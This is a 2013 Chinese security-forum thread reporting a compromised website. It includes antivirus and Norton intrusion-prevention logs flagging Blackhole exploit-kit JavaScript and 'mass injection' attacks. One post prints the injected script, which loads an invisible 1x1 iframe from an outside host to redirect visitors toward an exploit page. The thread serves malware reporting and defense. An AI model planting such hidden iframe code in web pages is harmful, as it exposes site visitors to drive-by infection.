http://www.joaojardim.net/a/index.php?option=com_expose

显示全部楼层 · 发表于 2013-4-12 13:25:23

2013/4/12 13:24:12 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RLIJ4Q7J\index[1].htm\00001e9e.js JS/Exploit-Blacole.le (特洛伊)
2013/4/12 13:24:12 已删除 l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RLIJ4Q7J\index[1].htm\000051f8.js JS/Exploit-Blacole.le (特洛伊)

显示全部楼层 · 发表于 2013-4-12 15:54:37

本帖最后由哀酱俏佳人于 2013-4-12 15:57 编辑

(function () {
var wgjtl = document.createElement('iframe');

wgjtl.src = 'http://tousif.com
uv.com/sg_services_media/rel.php';
wgjtl.style.position = 'absolute';
wgjtl.style.border = '
0';
wgjtl.style.height = '1px';
wgjtl.style.width = '1px';
wgjtl.style.left = '1px';

wgjtl.style.top = '1px';

if (!document.getElementById('wgjtl')) {
document.write('<div
id=\'wgjtl\'></div>');
document.getElementById('wgjtl').appendChild(wgjtl);
}
})();

不知还有木有其他的

显示全部楼层 · 发表于 2013-4-12 17:22:54

本帖最后由 Tom179090 于 2013-4-12 17:24 编辑

诺顿拦截到两次攻击
类别：入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明
2013/4/12 星期五 17:21:56,高,阻止了 ww w.j oaojardim.net 的入侵企图,已阻止,不需要操作,Web Attack: Mass Injection Website 5,不需要操作,不需要操作,"ww w.joaojardim.net (108.162.199.114, 80)",[url]www.joaojardim.net/a/index.php?option=com_expose"TOM (192.168.1.14, 60219)",108.162.199.114 (108.162.199.114),"TCP, ww w-http"
来自 www.joaojardim.net/a/index .php?option=com_expose 的网络通信与已知攻击的特征相匹配。攻击由 \DEVICE\HARDDISKVOLUME2\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE 引起。 要停止接收有关此类通信的通知，请在“操作”面板中单击“不再提醒我”。
类别：入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明
2013/4/12 星期五 17:21:58,高,阻止了 [url]www.joaojardim.net 的入侵企图,已阻止,不需要操作,Web Attack: Mass Injection Website 5,不需要操作,不需要操作,"www.joao jardim.net (108.162.199.114, 80)",[url]www.joaojardim.net/a/in dex.php?option=com_expose,"TOM (192.168.1.14, 60220)",108.162.199.114 (108.162.199.114),"TCP, www-http"
来自 www.joaojardim.net/a/index.php?option=com_expose 的网络通信与已知攻击的特征相匹配。攻击由 \DEVICE\HARDDISKVOLUME2\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE 引起。 要停止接收有关此类通信的通知，请在“操作”面板中单击“不再提醒我”。

[已鉴定] http://www.joaojardim.net/a/index.php?option=com_expose